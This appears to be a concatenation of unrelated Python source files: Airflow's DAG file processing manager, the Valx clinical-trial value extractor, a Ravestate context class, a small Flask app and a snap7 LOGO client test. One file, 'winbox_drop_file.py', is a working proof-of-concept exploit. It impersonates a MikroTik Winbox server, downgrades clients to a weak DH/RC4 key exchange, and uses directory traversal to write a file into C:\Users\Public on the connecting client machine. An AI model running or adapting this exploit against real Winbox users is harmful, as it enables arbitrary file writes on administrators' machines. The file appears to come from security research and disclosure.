'dag_processing.last_run.seconds_ago.{}'.format(file_name),
seconds_ago
)
rows.append((file_path,
processor_pid,
runtime,
last_runtime,
last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[3] or 0.0)
formatted_rows = []
for file_path, pid, runtime, last_runtime, last_run in rows:
formatted_rows.append((file_path,
pid,
"{:.2f}s".format(runtime)
if runtime else None,
"{:.2f}s".format(last_runtime)
if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S")
if last_run else None))
log_str = ("\n" +
"=" * 80 +
"\n" +
"DAG File Processing Stats\n\n" +
tabulate(formatted_rows, headers=headers) +
"\n" +
"=" * 80)
self.log.info(log_str)
@property
def file_paths(self):
return self._file_paths
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_runtime(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the current runtime (in seconds) of the process that's
processing the specified file or None if the file is not currently
being processed
"""
if file_path in self._processors:
return (timezone.utcnow() - self._processors[file_path].start_time)\
.total_seconds()
return None
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
return self._last_runtime.get(file_path)
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
return self._last_finish_time.get(file_path)
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue
if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
processor.terminate()
self._processors = filtered_processors
def wait_until_finished(self):
"""
Sleeps until all the processors are done.
"""
for file_path, processor in self._processors.items():
while not processor.done:
time.sleep(0.1)
def collect_results(self):
"""
Collect the result from any finished DAG processors
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
self._kill_timed_out_processors()
finished_processors = {}
""":type : dict[unicode, AbstractDagFileProcessor]"""
running_processors = {}
""":type : dict[unicode, AbstractDagFileProcessor]"""
for file_path, processor in self._processors.items():
if processor.done:
self.log.debug("Processor for %s finished", file_path)
now = timezone.utcnow()
finished_processors[file_path] = processor
self._last_runtime[file_path] = (now -
processor.start_time).total_seconds()
self._last_finish_time[file_path] = now
self._run_count[file_path] += 1
else:
running_processors[file_path] = processor
self._processors = running_processors
self.log.debug("%s/%s DAG parsing processes running",
len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing",
len(self._file_path_queue))
# Collect all the DAGs that were found in the processed files
simple_dags = []
for file_path, processor in finished_processors.items():
if processor.result is None:
self.log.warning(
"Processor for %s exited with return code %s.",
processor.file_path, processor.exit_code
)
else:
for simple_dag in processor.result:
simple_dags.append(simple_dag)
return simple_dags
def heartbeat(self):
"""
This should be periodically called by the manager loop. This method will
kick off new processes to process DAG definition files and read the
results from the finished processors.
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
simple_dags = self.collect_results()
# Generate more file paths to process if we processed all the files
# already.
if len(self._file_path_queue) == 0:
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
file_paths_recently_processed = []
for file_path in self._file_paths:
last_finish_time = self.get_last_finish_time(file_path)
if (last_finish_time is not None and
(now - last_finish_time).total_seconds() <
self._file_process_interval):
file_paths_recently_processed.append(file_path)
files_paths_at_run_limit = [file_path
for file_path, num_runs in self._run_count.items()
if num_runs == self._max_runs]
files_paths_to_queue = list(set(self._file_paths) -
set(file_paths_in_progress) -
set(file_paths_recently_processed) -
set(files_paths_at_run_limit))
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path, processor.start_time.isoformat()
)
self.log.debug(
"Queuing the following files for processing:\n\t%s",
"\n\t".join(files_paths_to_queue)
)
self._file_path_queue.extend(files_paths_to_queue)
# Start more processors if we have enough slots and files to process
while (self._parallelism - len(self._processors) > 0 and
len(self._file_path_queue) > 0):
file_path = self._file_path_queue.pop(0)
processor = self._processor_factory(file_path)
processor.start()
self.log.debug(
"Started a process (PID: %s) to generate tasks for %s",
processor.pid, file_path
)
self._processors[file_path] = processor
# Update heartbeat count.
self._run_count[self._heart_beat_key] += 1
return simple_dags
def _kill_timed_out_processors(self):
"""
Kill any file processors that timeout to defend against process hangs.
"""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.info(
"Processor for %s with PID %s started at %s has timed out, "
"killing it.",
processor.file_path, processor.pid, processor.start_time.isoformat())
Stats.incr('dag_file_processor_timeouts', 1, 1)
processor.kill()
def max_runs_reached(self):
"""
:return: whether all file paths have been processed max_runs times
"""
if self._max_runs == -1: # Unlimited runs.
return False
for file_path in self._file_paths:
if self._run_count[file_path] < self._max_runs:
return False
if self._run_count[self._heart_beat_key] < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if len(pids_to_kill) > 0:
# First try SIGTERM
this_process = psutil.Process(os.getpid())
# Only check child processes to ensure that we don't have a case
# where we kill the wrong process because a child process died
# but the PID got reused.
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
for child in child_processes:
self.log.info("Terminating child PID: %s", child.pid)
child.terminate()
# TODO: Remove magic number
timeout = 5
self.log.info("Waiting up to %s seconds for processes to exit...", timeout)
try:
psutil.wait_procs(
child_processes, timeout=timeout,
callback=lambda x: self.log.info('Terminated PID %s', x.pid))
except psutil.TimeoutExpired:
self.log.debug("Ran out of time while waiting for processes to exit")
# Then SIGKILL
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
if len(child_processes) > 0:
self.log.info("SIGKILL processes that did not terminate gracefully")
for child in child_processes:
self.log.info("Killing child PID: %s", child.pid)
child.kill()
child.wait()
|
Valx_CTgov_multiCPUcores.py
|
# Valx: A system for extracting and structuring numeric lab test comparison statements from text
# Created by Tony HAO, th2510@columbia.edu
# Please kindly cite the paper: Tianyong Hao, Hongfang Liu, Chunhua Weng. Valx: A system for extracting and structuring numeric lab test comparison statements from text. Methods of Information in Medicine. Vol. 55: Issue 3, pp. 266-275, 2016
import W_utility.file as ufile
from W_utility.log import ext_print
import os,sys,re
import Valx_core
from multiprocessing import Process, Manager
#thread worker function
def worker(trials, start,end, var, features, feature_dict_dk, fea_dict_umls, output):
#load numeric feature list
Valx_core.init_features()
for i in range(start,end+1):
if i%200 == 0: #define output frequency
print ('processing %d' % i)
# pre-processing text,
text = Valx_core.preprocessing(trials[i][1]) # trials[i][1] is eligibility criteria text
(sections_num, candidates_num) = Valx_core.extract_candidates_numeric(text) # extract candidates containing numeric features
for j in range(len(candidates_num)): # for each candidate
exp_text = Valx_core.formalize_expressions(candidates_num[j]) # identify and formalize values
(exp_text, key_ngrams) = Valx_core.identify_variable(exp_text, feature_dict_dk, fea_dict_umls) # identify variable mentions and map to names
(variables, vars_values) = Valx_core.associate_variable_values(exp_text)
all_exps = []
for k in range(len(variables)):
curr_var = variables[k]
curr_exps = vars_values[k]
if curr_var in features:
fea_list = features[curr_var]
curr_exps = Valx_core.context_validation(curr_exps, fea_list[1], fea_list[2])
curr_exps = Valx_core.normalization(fea_list[3], curr_exps) # unit conversion and value normalization
curr_exps = Valx_core.hr_validation (curr_exps, float(fea_list[4]), float(fea_list[5])) # heuristic rule-based validation
if len(curr_exps) > 0:
if var == "All" or var.lower() == curr_var.lower() or var.lower() in curr_var.lower(): all_exps += curr_exps
if len(all_exps) > 0: output.append((trials[i][0], sections_num[j], candidates_num[j], exp_text, str(all_exps).replace("u'", "'"))) # output result
def extract_variables (fdin, ffea, ffea2, var, cores):
# read input dataset
if fdin is None or fdin =="": return False
trials = ufile.read_csv (fdin)
if trials is None or len(trials) <= 0:
print(ext_print)
print('input data error, please check either no such file or no data --- interrupting')
return False
print(ext_print)
print('found a total of %d data items' % len(trials))
# read feature list - domain knowledge
if ffea is None or ffea =="": return False
fea_dict_dk = ufile.read_csv_as_dict_with_multiple_items (ffea)
if fea_dict_dk is None or len(fea_dict_dk) <= 0:
print(ext_print)
print('no feature data available --- interrupting')
return False
# get feature info
features, feature_dict_dk = {}, {}
if var == "All":
features = fea_dict_dk
del features["Variable name"]
elif var in fea_dict_dk:
features = {var: fea_dict_dk[var]}
for key, value in fea_dict_dk.iteritems():
names = value[0].lower().split('|')
for name in names:
if name.strip() != '': feature_dict_dk[name.strip()] = key
# read feature list - umls
if ffea2 is None or ffea2 =="": return False
fea_dict_umls = ufile.read_csv_as_dict (ffea2)
if fea_dict_umls is None or len(fea_dict_umls) <= 0:
print(ext_print)
print('no feature data available --- interrupting')
return False
output = Manager().list()
jobs = []
for i in range(1,cores+1):
t = Process(target=worker, args=(trials, len(trials)*(i-1)/cores,len(trials)*i/cores-1, var, features, feature_dict_dk, fea_dict_umls, output))
jobs.append(t)
t.start()
for j in jobs: j.join()
fout = os.path.splitext(fdin)[0] + "_exp_%s.csv" % var
ufile.write_csv (fout, output)
print(ext_print)
print('saved processed results into: %s' % fout)
return True
# processing the command line options
import argparse
def _process_args():
parser = argparse.ArgumentParser(description='')
parser.add_argument('-i', default=r"D:\_My_programs\_CUMC\Extract_Variables\_GitHub\data\example data diabetes_Type 1.csv", help='input: a specific disease')
parser.add_argument('-f1', default=r"D:\_My_programs\_CUMC\Extract_Variables\_GitHub\data\variable_features_dk.csv", help='input: a feature list')
parser.add_argument('-f2', default=r"D:\_My_programs\_CUMC\Extract_Variables\_GitHub\data\variable_features_umls.csv", help='input: a feature list')
parser.add_argument('-v', default="HBA1C", help='Variable name: All, HBA1C, BMI, Glucose, Creatinine, BP-Systolic, BP-Diastolic') # 'All' means to detect all variables
parser.add_argument('-c', default=4, type=int, help=' define the number of used CPU cores') #
return parser.parse_args(sys.argv[1:])
if __name__ == '__main__' :
print('')
args = _process_args()
extract_variables (args.i, args.f1, args.f2, args.v, args.c)
print('')
|
winbox_drop_file.py
|
import random
import threading
import socket
import sys
import time
##
# This file implements the Winbox server's key exchange and encryption mechanism
# for Winbox before 6.43. The key exchange is Diffie Hellman using a 1984 bit
# non-standard prime and the encryption is a custom RC4 drop-3072 using a 124
# byte session key.
#
# This server won't respond to the initial ECSRP-5 message from the client. When
# that happens, the client will then switch to the DH implementation.
#
# Furthermore, Winbox is vulnerable to directory traversal. A man in the middle
# can write files anywhere on the box. This PoC drops the file "lol.txt" in
# C:\Users\Public\ with the contents of "hello mikrotik"
##
##
# Obj: RC4
#
# An implementation of the RC4 logic used by MikroTik's Winbox on versions
# before 6.43. This is an RC4 drop-3072 with various non-standard mixing. The
# expected key is 0x78 bytes and is half of a session key generated / exchanged
# via Diffie Hellman key exchange.
##
class RC4:
# Standard RC4 drop-3072 initialization except for two things:
# 1. the value of j, after initializing S, is carried over to future computations
# 2. the value 'k' is introduced. While not used in the init function itself,
# this variable will be used to mix in previous computations in the
# "block crypt" function. I'm not sure if this is from some published
# variant of RC4 but I do wonder if it can help an attacker understand
# the stream state based on known plaintext?
def __init__(self, key):
# init the sbox
self.S = list(range(0x100))
j = 0
for i in range(0x100):
j = (j + key[i % len(key)] + self.S[i]) & 0xff
t = self.S[i]
self.S[i] = self.S[j]
self.S[j] = t
self.i = 0
self.j = j
self.k = 0
# "drop" 3072 of key stream
for _ in range(0xc00):
self.gen()
# Standard RC4 generation. *Only* used by init
def gen(self):
i = self.i = (self.i + 1) & 255
j = self.j = (self.j + self.S[i]) & 255
t = self.S[i]
self.S[i] = self.S[j]
self.S[j] = t
return self.S[(self.S[i] + self.S[j]) & 255]
def send_block_crypt(self, data, padding, client = False):
retval_data = bytearray(data)
data_length = len(retval_data)
counter = 0
j = self.j
while (counter < data_length):
i = (self.i + counter + 1) & 255
j = (j + self.k + self.S[i]) & 255
t = self.S[i]
self.S[i] = self.S[j]
self.S[j] = t
retval_data[counter] = data[counter] ^ self.S[(self.S[i] + self.S[j]) & 255]
if client == True:
self.k = retval_data[counter]
else:
self.k = data[counter]
counter = counter + 1
j = self.k + j
for i in range(256):
j = (j + self.S[i] & 0xff)
t = self.S[i]
self.S[i] = self.S[j]
self.S[j] = t
retval_padding = bytearray(10)
counter = 0
while (counter < 10):
i = (counter + (self.i + data_length + 1)) & 255
j = (j + self.S[i] & 0xff)
t = self.S[i]
self.S[i] = self.S[j]
self.S[j] = t
retval_padding[counter] = padding[counter] ^ self.S[(self.S[i] + self.S[j]) & 255]
counter = counter + 1
self.i = data_length + 10
self.j = j
if client == False:
self.k = 0
return retval_padding + retval_data
def get_request_id(data):
id_offset = data.find(b'\x06\x00\xff\x09')
if (id_offset == -1):
id_offset = data.find(b'\x06\x00\xff\x08')
if (if_offset == -1):
return None
else:
return data[id_offset:id_offset+6]
else:
return data[id_offset:id_offset+5]
def get_login_hash(data):
hash_offset = data.find(b'\x0a\x00\x00\x31\x11\x00')
if (hash_offset == -1):
return None
else:
return data[hash_offset:hash_offset+22]
def downgrade_attack(sock):
# Currently just listening for messages to 5 (DH) and 6 (ECSRP)
message_length = sock.recv(1)
handler = sock.recv(1)
if (handler[0] == 5):
print('No need to downgrade. Received DH request.')
elif (handler[0] == 6):
# ignore this packet. This should trigger a DH request
ignore = sock.recv(message_length[0])
# the client should send a DH key exchange request now
message_length = sock.recv(1)
handler = sock.recv(1)
if (handler[0] != 5):
print('Client didn\'t request a DH key exchange: %x' % handler[0])
sock.close()
return
else:
print('Client didn\'t request a key exchange: %x' % handler[0])
sock.close()
return
if (message_length[0] != 0xf8):
print('[-] Client sent unexpected amount of DH public data: %x' % message_length[0])
sock.close()
return
client_public_bytes = sock.recv(message_length[0])
client_public = int.from_bytes(client_public_bytes, byteorder='big', signed=False)
print('[+] Received client\'s public component:')
print('\t%x' % client_public)
print('[+] Generating a secret:')
local_secret = random.getrandbits(128)
print('\t%x' % local_secret)
print('[+] Computing server\'s public component: ')
shared_prime = int("B7BA220582B41518F8526BFE0F624DE926106DFB4F719DD93BC4309D49045A4175DB1C58C4D7843D16E766226894B31793B13E789FFD2CF3331267476031B30D2F995237F0B59A33A4F972FB1A618556EF8F332E7A3C366B24FDB39B42B0670B1F90A3D2E8C22E78DDA51A16B46A8E693BB9AED29E8509361BD438E76B1C235FCDD11E70A2B8C0EA15A9DFEA03278F39C12520A0BC36F21694546154C82E065B2EFFD7DDEBD5C1E588F9916F87D80E91303C9435A20E91DD1C9360DEF6A2B0D54FDA44049C0E8CC8A8049CBB1432C6E322D603F41DAA60028C40D78A8653F659C4FFC3F5D8A4E01A5C08E4B04B52388E9EF4A5E24569D15F", 16)
shared_base = 5
server_public = pow(shared_base, local_secret, shared_prime)
print('\t%x' % server_public)
print('[+] Sending server\'s public component to client.')
sock.sendall(b'\xf8' + b'\x05' + server_public.to_bytes(0xf8, byteorder='big'))
print('[+] Computing session key:')
shared_secret = pow(client_public, local_secret, shared_prime)
print('\t%x' % shared_secret)
mega_key = shared_secret.to_bytes(0xf8, byteorder='big')
send_key = mega_key[0x7c:]
recv_key = mega_key[:0x7c]
print('[+] Seeding RC4 engines')
crypto_out = RC4(send_key)
crypto_in = RC4(recv_key)
print('[+] Waiting for salt request')
message_length = sock.recv(1)
handler = sock.recv(1)
if (handler[0] != 5):
print('[-] Client sent unexpected handler: %x' % handler[0])
sock.close()
return
if (message_length[0] != 0x38):
print('[-] Client request is an unexpected length: %x' % message_length[0])
sock.close()
return
print('[+] Received salt request')
encrypted_salt_request = sock.recv(message_length[0])
payload = encrypted_salt_request[12:]
padding = encrypted_salt_request[2:12]
print('[+] Decrypting the request')
indata = crypto_in.send_block_crypt(payload, padding, True);
print('[+] Sending salt response')
# Our response actually provides a 0 length salt. Which the client seems
# to happily accept.
padding = b'\x00'*10
salt_response = (b'M2\x01\x00\xff\x88\x02\x00\x00\x00\x00\x00' +
b'\x0b\x00\x00\x00\x02\x00\xff\x88\x02\x00\x0d\x00\x00\x00\x04' +
b'\x00\x00\x00\x03\x00\xff\x09\x02\x06\x00\xff\x09\x02\x09\x00' +
b'\x00\x31\x00')
outdata = crypto_out.send_block_crypt(salt_response, padding);
print('%x' % len(outdata))
sock.sendall(b'\x39' + b'\x05' + b'\x00' + b'\x2d' + outdata)
print('[+] Waiting for a login request')
message_length = sock.recv(1)
handler = sock.recv(1)
if (handler[0] != 5):
print('[-] Client sent unexpected handler: %x' % handler[0])
sock.close()
return
print('[+] Received a login request')
encrypted_salt_request = sock.recv(message_length[0])
payload = encrypted_salt_request[12:]
padding = encrypted_salt_request[2:12]
print('[+] Decrypting the request')
indata = crypto_in.send_block_crypt(payload, padding, True);
request_field = get_request_id(indata)
hash_field = get_login_hash(indata)
padding = b'\x00'*10
login_response = (b'M2\x01\x00\xff\x88\x02\x00\x00\x00\x00\x00\x0b\x00\x00\x00' +
b'\x02\x00\xff\x88\x02\x00\x0d\x00\x00\x00\x04\x00\x00\x00' +
b'\x13\x00\x00\x00\x0b\x00\x00\x08\xfe\xff\x07\x00' +
b'\x0f\x00\x00\x09\x00\x10\x00\x00\x09\x00\x01\x00\xfe\x09\x06' +
b'\x03\x00\xff\x09\x02' + request_field +
b'\x16\x00\x00\x21\x04\x33\x2e\x31\x31\x17\x00\x00\x21\x03\x78\x38\x36' +
b'\x15\x00\x00\x21\x03\x78\x38\x36\x18\x00\x00\x21\x07\x64\x65\x66\x61' +
b'\x75\x6c\x74\x11\x00\x00\x21\x04\x69\x33\x38\x36' + hash_field)
outdata = crypto_out.send_block_crypt(login_response, padding);
print("%x" % len(outdata))
sock.sendall(b'\x93' + b'\x05' + b'\x00' + b'\x87' + outdata)
print('[+] Waiting for list request')
message_length = sock.recv(1)
handler = sock.recv(1)
if (handler[0] != 0x02):
print('[-] Client sent unexpected handler: %x' % handler[0])
sock.close()
return
print('[+] Received list request')
list_request = sock.recv(message_length[0])
if (list_request.find(b'list') == -1):
print('[-] No list in the list request.')
list_response = (b'{ crc: 164562873, size: 36, name: "../../../../../../../../../Users/Public/lol.txt", unique: "advtool-fc1932f6809e.jg", version: "6.39.3" },\n' +
b'{ crc: 2939435109, size: 3082, name: "dhcp.jg", unique: "dhcp-eaa3bb8c4b37.jg", version: "6.39.3" },\n' +
b'{ crc: 1183779834, size: 12489, name: "dude.jg", unique: "dude-65f18faed649.jg", version: "6.39.3" },\n' +
b'{ crc: 444782794, size: 433, name: "gps.jg", unique: "gps-21fa81423a5e.jg", version: "6.39.3" },\n' +
b'{ crc: 2740765060, size: 4060, name: "hotspot.jg", unique: "hotspot-2813a8dedd22.jg", version: "6.39.3" },\n' +
b'{ crc: 1093970965, size: 22451, name: "icons.png", version: "6.39.3" },\n' +
b'{ crc: 1377190509, size: 6389, name: "ipv6.jg", unique: "ipv6-38ef11eebb50.jg", version: "6.39.3" },\n' +
b'{ crc: 165461532, size: 1473, name: "kvm.jg", unique: "kvm-6e1029470a44.jg", version: "6.39.3" },\n' +
b'{ crc: 667857209, size: 455, name: "lcd.jg", unique: "lcd-30a740bf5375.jg", version: "6.39.3" },\n' +
b'{ crc: 2317237032, size: 3578, name: "mpls.jg", unique: "mpls-9e478c42eb58.jg", version: "6.39.3" },\n' +
b'{ crc: 332542720, size: 457, name: "ntp.jg", unique: "ntp-412e80e06f88.jg", version: "6.39.3" },\n' +
b'{ crc: 2870762863, size: 2342, name: "pim.jg", unique: "pim-fac4ce9edd44.jg", version: "6.39.3" },\n' +
b'{ crc: 2324128268, size: 4399, name: "ppp.jg", unique: "ppp-5d3353bc82f1.jg", version: "6.39.3" },\n' +
b'{ crc: 1771368162, size: 61639, name: "roteros.jg", unique: "roteros-228bb3ad6def.jg", version: "6.39.3" },\n' +
b'{ crc: 2911091806, size: 8240, name: "roting4.jg", unique: "roting4-2cabe59181eb.jg", version: "6.39.3" },\n' +
b'{ crc: 367607478, size: 3434, name: "secure.jg", unique: "secure-772b3b028ba8.jg", version: "6.39.3" },\n' +
b'{ crc: 1617938236, size: 765, name: "ups.jg", unique: "ups-e29683c8d492.jg", version: "6.39.3" },\n' +
b'{ crc: 3264462467, size: 15604, name: "wlan6.jg", unique: "wlan6-032bb1ee138d.jg", version: "6.39.3" },\n')
## header
header = b'\x6c\x69\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x07\x29\x00\x00\x00\x00'
all_of_it = header + list_response
chunks = []
looper = range(0, len(all_of_it), 255)
for n in looper:
if ((n + 255) > len(all_of_it)):
chunks.append(all_of_it[n:])
else:
chunks.append(all_of_it[n:n+255])
# send first bytes
sock.sendall(b'\xff\x02')
first = True
for n in chunks:
if first == True:
first = False
sock.sendall(n)
else:
if (len(n) == 255):
sock.sendall(b'\xff\xff')
sock.sendall(n)
else:
sock.sendall(bytes([len(n)]))
sock.sendall(b'\xff')
sock.sendall(n)
print('[+] Waiting for list close message')
message_length = sock.recv(1)
handler = sock.recv(1)
if (handler[0] != 0x02):
print('[-] Client sent unexpected handler: %x' % handler[0])
sock.close()
return
print('[+] Received list close message')
list_request = sock.recv(message_length[0])
if (list_request.find(b'list') == -1):
print('[-] No list in the list close message.')
sock.sendall(b'\x12\x02\x6c\x69\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x07\x29')
print('[+] Waiting for file message')
message_length = sock.recv(1)
handler = sock.recv(1)
if (handler[0] != 0x02):
print('[-] Client sent unexpected handler: %x' % handler[0])
sock.close()
return
print('[+] Received file message')
list_request = sock.recv(message_length[0])
if (list_request.find(b'../../../') == -1):
print('[-] No lol.txt in the list close message.')
header = b'../../../.\x00\x01\x24\x00\x00\x00\x00\x00'
gzip = b'\x1f\x8b\x08\x08\x62\x85\x1f\x5e\x00\x03\x6c\x6f\x6c\x00\xcb\xc8\x54\xc8\xcd\xcc\x2e\xca\x2f\xc9\xcc\xe6\x02\x00\xc8\x62\x79\x42\x0c\x00\x00\x00'
all_of_it = header + gzip
# send first bytes
sock.sendall(bytes([len(all_of_it)]))
sock.sendall(b'\x02')
sock.sendall(all_of_it)
sock.close()
return
if __name__ == '__main__':
# bind to 8291 on all interfaces
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('0.0.0.0', 8291))
server.listen(5)
print('[+] Listening on 0.0.0.0:8291')
while True:
client_sock, address = server.accept()
print('[+] Accepted connection from %s:%s' % (address[0], address[1]))
client_handler = threading.Thread(target=downgrade_attack, args=(client_sock,))
client_handler.start()
|
context.py
|
# Ravestate context class
import importlib
from threading import Thread, Lock, Semaphore
import logging
from ravestate import icontext
from ravestate import activation
from ravestate import module
from ravestate import state
from ravestate import property
from ravestate import registry
class Context(icontext.IContext):
default_signals = (":startup", ":shutdown", ":idle")
default_property_signals = (":changed", ":pushed", ":popped", ":deleted")
def __init__(self, configfile: str=""):
self.signal_queue = []
self.signal_queue_lock = Lock()
self.signal_queue_counter = Semaphore(0)
self.run_task = None
self.shutdown_flag = False
self.properties = {}
self.activation_candidates = dict()
self.states = set()
self.states_per_signal = {signal_name: set() for signal_name in self.default_signals}
self.states_lock = Lock()
def emit(self, signal_name: str):
with self.signal_queue_lock:
self.signal_queue.append(signal_name)
self.signal_queue_counter.release()
def run(self):
if self.run_task:
logging.error("Attempt to start context twice!")
return
self.run_task = Thread(target=self._run_private)
self.run_task.start()
self.emit(":startup")
def shutting_down(self):
return self.shutdown_flag
def shutdown(self):
self.shutdown_flag = True
self.emit(":shutdown")
self.run_task.join()
def add_module(self, module_name: str):
if registry.has_module(module_name):
self._module_registration_callback(registry.get_module(module_name))
return
registry.import_module(module_name=module_name, callback=self._module_registration_callback)
def add_state(self, *, mod: module.Module, st: state.State):
if st in self.states:
logging.error(f"Attempt to add state `{st.name}` twice!")
return
# annotate the state's signal name with it's module name
if len(st.signal) > 0:
st.signal = f"{mod.name}:{st.signal}"
st.module_name = mod.name
# make sure that all of the state's depended-upon properties exist
for prop in st.read_props+st.write_props:
if prop not in self.properties:
logging.error(f"Attempt to add state which depends on unknown property `{prop}`!")
# register the state's signal
with self.states_lock:
if st.signal:
self.states_per_signal[st.signal] = set()
# make sure that all of the state's depended-upon signals exist
for clause in st.triggers:
for signal in clause:
if signal in self.states_per_signal:
self.states_per_signal[signal].add(st)
else:
logging.error(f"Attempt to add state which depends on unknown signal `{signal}`!")
self.states.add(st)
def rm_state(self, *, st: state.State):
if st not in self.states:
logging.error(f"Attempt to remove unknown state `{st.name}`!")
return
with self.states_lock:
if st.signal:
self.states_per_signal.pop(st.signal)
for clause in st.triggers:
for signal in clause:
self.states_per_signal[signal].remove(st)
self.states.remove(st)
def add_prop(self, *, mod: module.Module, prop: property.PropertyBase):
if prop.name in self.properties.values():
logging.error(f"Attempt to add property {prop.name} twice!")
return
# prepend module name to property name
prop.module_name = mod.name
# register property
self.properties[prop.fullname()] = prop
# register all of the property's signals
with self.states_lock:
for signal in self.default_property_signals:
self.states_per_signal[prop.fullname()+signal] = set()
def __setitem__(self, key, value):
pass
def __getitem__(self, key):
return self.properties[key]
def _module_registration_callback(self, mod: module.Module):
for st in mod.states:
self.add_state(mod=mod, st=st)
for prop in mod.props:
self.add_prop(mod=mod, prop=prop)
def _run_private(self):
while not self.shutdown_flag:
# TODO: Recognize and signal Idle-ness
self.signal_queue_counter.acquire()
with self.signal_queue_lock:
signal_name = self.signal_queue.pop(0)
# collect states which depend on the new signal,
# and create state activation objects for them if necessary
logging.debug(f"Received {signal_name} ...")
with self.states_lock:
for state in self.states_per_signal[signal_name]:
if state.name not in self.activation_candidates:
self.activation_candidates[state.name] = activation.StateActivation(state, self)
logging.debug("State activation candidates: \n"+"\n".join(
"- "+state_name for state_name in self.activation_candidates))
current_activation_candidates = self.activation_candidates
self.activation_candidates = dict()
consider_for_immediate_activation = []
# go through candidates and remove those which want to be removed,
# remember those which want to be remembered, forget those which want to be forgotten
for state_name, act in current_activation_candidates.items():
notify_return = act.notify_signal(signal_name)
logging.debug(f"-> {act.state_to_activate.name} returned {notify_return} on notify_signal {signal_name}")
if notify_return == 0:
self.activation_candidates[state_name] = act
elif notify_return > 0:
consider_for_immediate_activation.append(act)
# ignore act_state -1: Means that state activation is considering itself canceled
# sort the state activations by their specificity
consider_for_immediate_activation.sort(key=lambda act: act.specificity(), reverse=True)
# let the state with the highest specificity claim write props first, then lower ones.
# a state will only be activated if all of it's write-props are available.
# TODO: Recognize same-specificity states and actively decide between them.
claimed_write_props = set()
for act in consider_for_immediate_activation:
all_write_props_free = True
for write_prop in act.state_to_activate.write_props:
if write_prop in claimed_write_props:
all_write_props_free = False
break
if all_write_props_free:
logging.debug(f"-> Activating {act.state_to_activate.name}")
thread = act.run()
thread.start()
else:
logging.debug(f"-> Dropping activation of {act.state_to_activate.name}.")
|
flasky.py
|
# -*- coding: utf-8 -*-
from flask import Flask, request, make_response, render_template, Response, redirect, url_for
from .notifier import WebSocket
import json
from .utils.inventory import PlayBookFactory, async_run_playbook
import threading
import time
app = Flask(__name__)
@app.route('/api/<path:version>/<path:action>', methods=['POST'])
def api_view(version, action):
"""
"""
data = request.form
print(data)
WebSocket.send_message(json.dumps(data))
return make_response(Response())
@app.route('/')
def index_view():
return render_template('index.html')
def long_task():
time.sleep(5)
print('long task')
@app.route('/run')
def longtask_view():
pb = PlayBookFactory('production', inventory='op/inventory')
#pb.run_task()
async_run_playbook(pb)
t = threading.Thread(target=long_task)
t.start()
return redirect(url_for('index_view'))
return make_response(Response())
|
test_logo_client.py
|
import logging
import time
import unittest
from multiprocessing import Process
from os import kill
import snap7
from snap7.server import mainloop
logging.basicConfig(level=logging.WARNING)
ip = '127.0.0.1'
tcpport = 1102
db_number = 1
rack = 0x1000
slot = 0x2000
class TestLogoClient(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.process = Process(target=mainloop)
cls.process.start()
time.sleep(2) # wait for server to start
@classmethod
def tearDownClass(cls):
kill(cls.server_pid, 1)
def setUp(self):
self.client = snap7.logo.Logo()
self.client.connect(ip, rack, slot, tcpport)
def tearDown(self):
self.client.disconnect()
self.client.destroy()
def test_read(self):
vm_address = "V40"
value = 50
self.client.write(vm_address, value)
result = self.client.read(vm_address)
self.assertEqual(value, result)
def test_write(self):
vm_address = "V20"
value = 8
self.client.write(vm_address, value)
def test_get_connected(self):
self.client.get_connected()
def test_set_param(self):
values = (
(snap7.types.PingTimeout, 800),
(snap7.types.SendTimeout, 15),
(snap7.types.RecvTimeout, 3500),
(snap7.types.SrcRef, 128),
(snap7.types.DstRef, 128),
(snap7.types.SrcTSap, 128),
(snap7.types.PDURequest, 470),
)
for param, value in values:
self.client.set_param(param, value)
